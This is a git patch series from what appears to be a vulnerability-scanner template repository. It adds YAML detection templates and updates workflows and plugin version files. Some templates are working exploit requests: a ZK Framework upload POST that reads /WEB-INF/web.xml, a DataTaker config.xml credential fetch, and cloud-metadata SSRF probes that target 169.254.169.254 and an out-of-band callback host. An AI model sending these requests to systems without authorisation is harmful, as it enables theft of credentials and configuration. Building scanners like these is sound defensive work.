b201edfb9dbb2e7d6b9fa8c30586795b0275badf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 14 Jan 2023 04:02:09 +0000 Subject: [PATCH 0902/1133] Auto WordPress Plugins Update [Sat Jan 14 04:02:09 UTC 2023] :robot: --- helpers/wordpress/plugins/enable-media-replace.txt | 2 +- helpers/wordpress/plugins/mailchimp-for-wp.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/enable-media-replace.txt b/helpers/wordpress/plugins/enable-media-replace.txt index cc868b62c3..4bac418e4a 100644 --- a/helpers/wordpress/plugins/enable-media-replace.txt +++ b/helpers/wordpress/plugins/enable-media-replace.txt @@ -1 +1 @@ -4.0.1 \ No newline at end of file +4.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailchimp-for-wp.txt b/helpers/wordpress/plugins/mailchimp-for-wp.txt index d276af03a0..b617d997d7 100644 --- a/helpers/wordpress/plugins/mailchimp-for-wp.txt +++ b/helpers/wordpress/plugins/mailchimp-for-wp.txt @@ -1 +1 @@ -4.8.12 \ No newline at end of file +4.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index f7645df6c8..c05bdc7d96 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.14 \ No newline at end of file +13.2.15 \ No newline at end of file From 3321d8d6f521d02d7ae2c73f28b6d58c200a07da Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 14 Jan 2023 20:58:35 +0530 Subject: [PATCH 0903/1133] Added template for CVE-2022-36537 --- cves/2022/CVE-2022-36537.yaml | 64 +++++++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 cves/2022/CVE-2022-36537.yaml diff --git a/cves/2022/CVE-2022-36537.yaml b/cves/2022/CVE-2022-36537.yaml new file mode 100644 index 0000000000..1c16c5e365 --- /dev/null +++ b/cves/2022/CVE-2022-36537.yaml @@ -0,0 +1,64 @@ +id: CVE-2022-36537 + +info: + name: ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 - Sensitive Information Disclosure + author: theamanrawat + severity: high + description: | + ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader. + reference: + - https://github.com/Malwareman007/CVE-2022-36537/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-36537 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36537 + cwe-id: CWE-200 + metadata: + verified: "true" + shodan-query: http.title:"Server backup manager" + tags: cve,cve2022,sensitive-information,unauth,zk-framework + +requests: + - raw: + - | + GET /login.zul HTTP/1.1 + Host: {{Hostname}} + + - | + POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp + Content-Length: 154 + + ------WebKitFormBoundaryCs6yB0zvpfSBbYEp + Content-Disposition: form-data; name="nextURI" + + /WEB-INF/web.xml + ------WebKitFormBoundaryCs6yB0zvpfSBbYEp-- + + req-condition: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "display-name" + - "xml version" + - "web-app" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: dtid + group: 1 + regex: + - "dt:'(.*?)',cu:" + internal: true From 75e6e74a735a57dcb8ae8b429210e4426e914249 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 Jan 2023 04:01:59 +0000 Subject: [PATCH 0904/1133] Auto WordPress Plugins Update [Sun Jan 15 04:01:59 UTC 2023] :robot: --- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 9592b2f94b..be9e937a69 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.46.1 \ No newline at end of file +1.46.2 \ No newline at end of file From c3bc305f3f82d8b42ff66dc730dec6d9b762b8d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 Jan 2023 06:48:30 +0000 Subject: [PATCH 0907/1133] Auto Generated CVE annotations [Sun Jan 15 06:48:30 UTC 2023] :robot: --- vulnerabilities/other/elasticsearch5-log4j-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 39e72db161..fcc2ba39fd 100644 --- a/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + shodan-query: elastic indices verified: "true" - shodan-query: 'elastic indices' tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev requests: From 2df340537a31274ba9049d7c513372d8a6885cda Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 15 Jan 2023 13:42:13 +0530 Subject: [PATCH 0908/1133] interact domain update (#6538) --- misconfiguration/proxy/metadata-aws.yaml | 2 +- misconfiguration/proxy/metadata-azure.yaml | 2 +- misconfiguration/proxy/metadata-digitalocean.yaml | 2 +- misconfiguration/proxy/metadata-google.yaml | 2 +- misconfiguration/proxy/metadata-hetzner.yaml | 2 +- misconfiguration/proxy/metadata-openstack.yaml | 2 +- misconfiguration/proxy/metadata-oracle.yaml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/misconfiguration/proxy/metadata-aws.yaml b/misconfiguration/proxy/metadata-aws.yaml index 4f6f7d9b98..248df92bc0 100644 --- a/misconfiguration/proxy/metadata-aws.yaml +++ b/misconfiguration/proxy/metadata-aws.yaml @@ -31,7 +31,7 @@ requests: Host: {{hostval}} payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: diff --git a/misconfiguration/proxy/metadata-azure.yaml b/misconfiguration/proxy/metadata-azure.yaml index 2ccbb644a8..3abfc3a943 100644 --- a/misconfiguration/proxy/metadata-azure.yaml +++ b/misconfiguration/proxy/metadata-azure.yaml @@ -32,7 +32,7 @@ requests: Metadata: true payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: diff --git a/misconfiguration/proxy/metadata-digitalocean.yaml b/misconfiguration/proxy/metadata-digitalocean.yaml index b4abee015f..52e010da29 100644 --- a/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/misconfiguration/proxy/metadata-digitalocean.yaml @@ -31,7 +31,7 @@ requests: Host: {{hostval}} payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: diff --git a/misconfiguration/proxy/metadata-google.yaml b/misconfiguration/proxy/metadata-google.yaml index ca0e17a65d..c5856982c8 100644 --- a/misconfiguration/proxy/metadata-google.yaml +++ b/misconfiguration/proxy/metadata-google.yaml @@ -32,7 +32,7 @@ requests: Metadata-Flavor: Google payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: diff --git a/misconfiguration/proxy/metadata-hetzner.yaml b/misconfiguration/proxy/metadata-hetzner.yaml index 780a6e55cf..02a52f46f3 100644 --- a/misconfiguration/proxy/metadata-hetzner.yaml +++ b/misconfiguration/proxy/metadata-hetzner.yaml @@ -31,7 +31,7 @@ requests: Host: {{hostval}} payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: diff --git a/misconfiguration/proxy/metadata-openstack.yaml b/misconfiguration/proxy/metadata-openstack.yaml index 2ae550a808..c93a2c9044 100644 --- a/misconfiguration/proxy/metadata-openstack.yaml +++ b/misconfiguration/proxy/metadata-openstack.yaml @@ -31,7 +31,7 @@ requests: Host: {{hostval}} payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: diff --git a/misconfiguration/proxy/metadata-oracle.yaml b/misconfiguration/proxy/metadata-oracle.yaml index 3f3a7da28d..4a141293db 100644 --- a/misconfiguration/proxy/metadata-oracle.yaml +++ b/misconfiguration/proxy/metadata-oracle.yaml @@ -32,7 +32,7 @@ requests: Metadata: true payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 unsafe: true matchers: From 795b81dba789d6fa1afad86076ee4d4659fa1cc4 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sun, 15 Jan 2023 14:28:18 +0530 Subject: [PATCH 0910/1133] Added template for ntopng-traffic-dashboard --- technologies/ntopng-traffic-dashboard.yaml | 28 ++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/ntopng-traffic-dashboard.yaml diff --git a/technologies/ntopng-traffic-dashboard.yaml b/technologies/ntopng-traffic-dashboard.yaml new file mode 100644 index 0000000000..ca225d41b0 --- /dev/null +++ b/technologies/ntopng-traffic-dashboard.yaml @@ -0,0 +1,28 @@ +id: ntopng-traffic-dashboard + +info: + name: ntopng - Traffic Dashboard + author: theamanrawat + severity: low + metadata: + verified: true + shodan-query: http.title:"ntopng - Traffic Dashboard" + tags: tech,ntopng + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ntopng - Traffic Dashboard' + - 'https://github.com/ntop/ntopng' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From d4078a2cbc43f6871ad479a8a12974788798db7d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 15 Jan 2023 16:17:53 +0530 Subject: [PATCH 0911/1133] change-directory --- .../ntopng-traffic-dashboard.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename {technologies => misconfiguration}/ntopng-traffic-dashboard.yaml (91%) diff --git a/technologies/ntopng-traffic-dashboard.yaml b/misconfiguration/ntopng-traffic-dashboard.yaml similarity index 91% rename from technologies/ntopng-traffic-dashboard.yaml rename to misconfiguration/ntopng-traffic-dashboard.yaml index ca225d41b0..d90ad4f46d 100644 --- a/technologies/ntopng-traffic-dashboard.yaml +++ b/misconfiguration/ntopng-traffic-dashboard.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"ntopng - Traffic Dashboard" - tags: tech,ntopng + tags: misconfig,ntopng,dashboard requests: - method: GET @@ -25,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From c534469294154d606e086acc054efa1f3b76f888 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 Jan 2023 10:51:46 +0000 Subject: [PATCH 0912/1133] Auto Generated New Template Addition List [Sun Jan 15 10:51:46 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc672cb4bc..726c0f324d 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/installer/pmm-installer.yaml +misconfiguration/ntopng-traffic-dashboard.yaml misconfiguration/phpcli-stack-trace.yaml misconfiguration/springboot/spring-eureka.yaml misconfiguration/webdav-enabled.yaml From a0479cb87957c871d4cad3a565b27c3710fb487d Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Sun, 15 Jan 2023 18:11:22 +0530 Subject: [PATCH 0913/1133] Create CVE-2017-11165.yaml --- cves/2017/CVE-2017-11165.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2017/CVE-2017-11165.yaml diff --git a/cves/2017/CVE-2017-11165.yaml b/cves/2017/CVE-2017-11165.yaml new file mode 100644 index 0000000000..b1387dd4b8 --- /dev/null +++ b/cves/2017/CVE-2017-11165.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-11165 + +info: + name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure + author: theabhinavgaur + severity: critical + description: | + dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 + - https://www.exploit-db.com/exploits/45094 + metadata: + shodan-query: + - http.title:"datataker" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-200 + tags: cve,cve2017,DataTaker,config,exposure,lfr + +requests: + - method: GET + path: + - '{{BaseURL}}/services/getFile.cmd?userfile=config.xml' + + matchers-condition: and + matchers: + - type: word + words: + - + condition: and + + - type: status + status: + - 200 From 239629b61adb97d7d1da2a9a590017f07ad2371f Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Sun, 15 Jan 2023 18:59:59 +0530 Subject: [PATCH 0914/1133] Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- .../aem/aem-childrenlist-xss.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 misconfiguration/aem/aem-childrenlist-xss.yaml diff --git a/misconfiguration/aem/aem-childrenlist-xss.yaml b/misconfiguration/aem/aem-childrenlist-xss.yaml new file mode 100644 index 0000000000..ad7cbc4785 --- /dev/null +++ b/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -0,0 +1,38 @@ +id: aem-xss-childlist + +info: + name: Adobe Experience Manager - Childlist selector Cross-Site Scripting + author: theabhinavgaur + severity: medium + description: | + Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. + metadata: + verified: true + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe + + +requests: + - method: GET + path: + - "{{BaseURL}}/{{rand_base(4)}}{{rand_base(5)}}.childrenlist.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'data-coral-columnview-id' + condition: and + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 \ No newline at end of file From 2ea0c2a08eeb4e027abc31057cc1b4e1bd914cf3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 Jan 2023 13:30:14 +0000 Subject: [PATCH 0915/1133] Auto Generated New Template Addition List [Sun Jan 15 13:30:14 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 726c0f324d..69b8bbb972 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ exposed-panels/storybook-panel.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml file/keys/stackhawk-api-key.yaml +misconfiguration/aem/aem-childrenlist-xss.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml From 67c2af4e1f09e52285bf52749c72a9693467d0de Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 15 Jan 2023 21:06:49 +0530 Subject: [PATCH 0916/1133] go version update --- .github/workflows/template-db-indexer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index edcd467f8e..15d7650a40 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -12,7 +12,7 @@ jobs: steps: - uses: actions/setup-go@v2 with: - go-version: 1.17 + go-version: 1.18 - name: Installing Indexer run: | From 1ecebad546551449cb7551482ccc1c00f46642b4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 15 Jan 2023 21:17:43 +0530 Subject: [PATCH 0918/1133] go version update --- .github/workflows/template-db-indexer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 15d7650a40..e4917f317c 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -12,7 +12,7 @@ jobs: steps: - uses: actions/setup-go@v2 with: - go-version: 1.18 + go-version: 1.19 - name: Installing Indexer run: | From 0f7c2920d62e0ff10960f2546441dedf0c3c9ab2 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 15 Jan 2023 21:35:57 +0530 Subject: [PATCH 0920/1133] GH workflow updates (#6541) --- .github/workflows/cve-annotate.yml | 26 +++++++++++------------ .github/workflows/new-templates.yml | 2 ++ .github/workflows/syntax-checking.yml | 2 ++ .github/workflows/template-checksum.yml | 9 +++++--- .github/workflows/template-db-indexer.yml | 7 +++++- .github/workflows/template-validate.yml | 26 +++++++++++------------ .github/workflows/templates-stats.yml | 10 ++++++--- 7 files changed, 49 insertions(+), 33 deletions(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 48d45ba46f..44624a9aac 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -4,27 +4,27 @@ on: push: branches: - main + paths: + - 'cves/**.yaml' workflow_dispatch: jobs: docs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v3 + with: + fetch-depth: 0 - - name: Get Github tag - id: meta - run: | - curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT + - name: Set up Go + uses: actions/setup-go@v3 + with: + go-version: 1.19 + check-latest: true + cache: true - - name: Setup CVE annotate - if: steps.meta.outputs.TAG != '' - env: - VERSION: ${{ steps.meta.outputs.TAG }} - run: | - wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip - sudo unzip cve-annotate.zip -d /usr/local/bin - working-directory: /tmp + - name: cve-annotate install + run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest - name: Generate CVE Annotations id: cve-annotate diff --git a/.github/workflows/new-templates.yml b/.github/workflows/new-templates.yml index d3b137b58a..610b53a2dc 100644 --- a/.github/workflows/new-templates.yml +++ b/.github/workflows/new-templates.yml @@ -4,6 +4,8 @@ on: push: branches: - main + paths: + - '**.yaml' workflow_dispatch: jobs: diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index 3448b7baf9..f378bcc284 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -2,6 +2,8 @@ name: ❄️ YAML Lint on: pull_request: + paths: + - '**.yaml' workflow_dispatch: jobs: diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 95b0e29d0d..be0621b780 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -11,9 +11,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@master - - uses: actions/setup-go@v2 - with: - go-version: 1.18 + - name: Set up Go + uses: actions/setup-go@v3 + with: + go-version: 1.19 + check-latest: true + cache: true - name: install checksum generator run: | diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index e4917f317c..ce67a76f00 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -4,15 +4,20 @@ on: push: branches: - main + paths: + - '**.yaml' workflow_dispatch: jobs: index: runs-on: ubuntu-latest steps: - - uses: actions/setup-go@v2 + - name: Set up Go + uses: actions/setup-go@v3 with: go-version: 1.19 + check-latest: true + cache: true - name: Installing Indexer run: | diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index f18b88a31d..346d0857ae 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -2,26 +2,26 @@ name: 🛠 Template Validate on: pull_request: + paths: + - '**.yaml' jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v3 + with: + fetch-depth: 0 - - name: Get Github tag - id: meta - run: | - curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT + - name: Set up Go + uses: actions/setup-go@v3 + with: + go-version: 1.19 + check-latest: true + cache: true - - name: Setup Nuclei - if: steps.meta.outputs.TAG != '' - env: - VERSION: ${{ steps.meta.outputs.TAG }} - run: | - wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip - sudo unzip nuclei*.zip -d /usr/local/bin - working-directory: /tmp + - name: nuclei install + run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest - name: Template Validation run: | diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 2b4978d3c0..2bbf639947 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -13,9 +13,13 @@ jobs: - uses: actions/checkout@v3 with: fetch-depth: 0 - - uses: actions/setup-go@v2 - with: - go-version: 1.18 + + - name: Set up Go + uses: actions/setup-go@v3 + with: + go-version: 1.19 + check-latest: true + cache: true - name: Installing Template Stats run: | From 63b54672b098600c4229886fa9f255f6594bca7b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 16 Jan 2023 00:19:02 +0700 Subject: [PATCH 0922/1133] Update and rename vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml to cves/2022/CVE-2022-47945.yaml --- .../2022/CVE-2022-47945.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) rename vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml => cves/2022/CVE-2022-47945.yaml (60%) diff --git a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml b/cves/2022/CVE-2022-47945.yaml similarity index 60% rename from vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml rename to cves/2022/CVE-2022-47945.yaml index 36d1dd8e2a..a5bbe1362f 100644 --- a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml +++ b/cves/2022/CVE-2022-47945.yaml @@ -1,18 +1,19 @@ -id: thinkphp6-lang-lfi +id: CVE-2022-47945 info: name: Thinkphp Lang - LFI author: kagamigawa - severity: high + severity: critical description: | - Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI. + ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. reference: - https://tttang.com/archive/1865/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 metadata: verified: true shodan-query: title:"Thinkphp" fofa-query: header="think_lang" - tags: thinkphp,lfi + tags: cve,cve2022,thinkphp,lfi requests: - method: GET From cbc0ceed617afd029095bdb26d8192f358e8e88d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Jan 2023 00:39:02 +0530 Subject: [PATCH 0923/1133] Update CVE-2022-36537.yaml --- cves/2022/CVE-2022-36537.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-36537.yaml b/cves/2022/CVE-2022-36537.yaml index 1c16c5e365..4989548c32 100644 --- a/cves/2022/CVE-2022-36537.yaml +++ b/cves/2022/CVE-2022-36537.yaml @@ -17,7 +17,7 @@ info: metadata: verified: "true" shodan-query: http.title:"Server backup manager" - tags: cve,cve2022,sensitive-information,unauth,zk-framework + tags: cve,cve2022,zk-framework,exposure,unauth requests: - raw: @@ -39,14 +39,14 @@ requests: /WEB-INF/web.xml ------WebKitFormBoundaryCs6yB0zvpfSBbYEp-- - req-condition: true cookie-reuse: true matchers-condition: and matchers: - - type: word - part: body_2 - words: - - "display-name" + - type: regex + part: body + regex: + - ".*" + - "((.|\n)*)welcome-file-list>" - "xml version" - "web-app" condition: and From 340d9a04c8b2f76dfbe2d05d8f3ac4bddb2f805b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Jan 2023 01:32:03 +0530 Subject: [PATCH 0924/1133] Update CVE-2017-11165.yaml --- cves/2017/CVE-2017-11165.yaml | 25 +++++++++++++++---------- 1 file changed, 15 insertions(+), 10 deletions(-) diff --git a/cves/2017/CVE-2017-11165.yaml b/cves/2017/CVE-2017-11165.yaml index b1387dd4b8..df45e9d89f 100644 --- a/cves/2017/CVE-2017-11165.yaml +++ b/cves/2017/CVE-2017-11165.yaml @@ -7,29 +7,34 @@ info: description: | dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 - https://www.exploit-db.com/exploits/45094 - metadata: - shodan-query: - - http.title:"datataker" + - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-200 - tags: cve,cve2017,DataTaker,config,exposure,lfr + cve-id: CVE-2017-11165 + metadata: + verified: true + shodan-query: http.title:"datataker" + tags: cve,cve2017,datataker,config,exposure,lfr requests: - method: GET path: - - '{{BaseURL}}/services/getFile.cmd?userfile=config.xml' + - "{{BaseURL}}/services/getFile.cmd?userfile=config.xml" matchers-condition: and matchers: - type: word words: - - + - "COMMAND_SERVER" + - "" + - "config id=\"config" condition: and + - type: word + part: header + words: + - "text/xml" + - type: status status: - 200 From 33266ab033d26ede4334ea41668b2323383ab55b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 Jan 2023 04:01:52 +0000 Subject: [PATCH 0925/1133] Auto WordPress Plugins Update [Mon Jan 16 04:01:52 UTC 2023] :robot: --- helpers/wordpress/plugins/otter-blocks.txt | 1 + .../plugins/under-construction-page.txt | 2 +- .../wordpress/plugins/otter-blocks.yaml | 49 +++++++++++++++++++ 3 files changed, 51 insertions(+), 1 deletion(-) create mode 100644 helpers/wordpress/plugins/otter-blocks.txt create mode 100644 technologies/wordpress/plugins/otter-blocks.yaml diff --git a/helpers/wordpress/plugins/otter-blocks.txt b/helpers/wordpress/plugins/otter-blocks.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/helpers/wordpress/plugins/otter-blocks.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/helpers/wordpress/plugins/under-construction-page.txt b/helpers/wordpress/plugins/under-construction-page.txt index 66ad8b6f98..844c7e03d7 100644 --- a/helpers/wordpress/plugins/under-construction-page.txt +++ b/helpers/wordpress/plugins/under-construction-page.txt @@ -1 +1 @@ -3.95 \ No newline at end of file +3.96 \ No newline at end of file diff --git a/technologies/wordpress/plugins/otter-blocks.yaml b/technologies/wordpress/plugins/otter-blocks.yaml new file mode 100644 index 0000000000..b05164fcf1 --- /dev/null +++ b/technologies/wordpress/plugins/otter-blocks.yaml @@ -0,0 +1,49 @@ +id: wordpress-otter-blocks + +info: + name: Otter – Gutenberg Blocks – Page Builder for Gutenberg Editor & FSE Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/otter-blocks/ + metadata: + plugin_namespace: otter-blocks + wpscan: https://wpscan.com/plugin/otter-blocks + tags: tech,wordpress,wp-plugin,top-200 + +requests: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/otter-blocks/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/otter-blocks.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From 89674487d237fd75d9cd9c0a24a4a1ad3e085810 Mon Sep 17 00:00:00 2001 From: sergheusz Date: Mon, 16 Jan 2023 03:03:44 -0300 Subject: [PATCH 0926/1133] Added template mylittleadmin-panel --- exposed-panels/mylittleadmin-panel.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/mylittleadmin-panel.yaml diff --git a/exposed-panels/mylittleadmin-panel.yaml b/exposed-panels/mylittleadmin-panel.yaml new file mode 100644 index 0000000000..6b7e76479c --- /dev/null +++ b/exposed-panels/mylittleadmin-panel.yaml @@ -0,0 +1,27 @@ 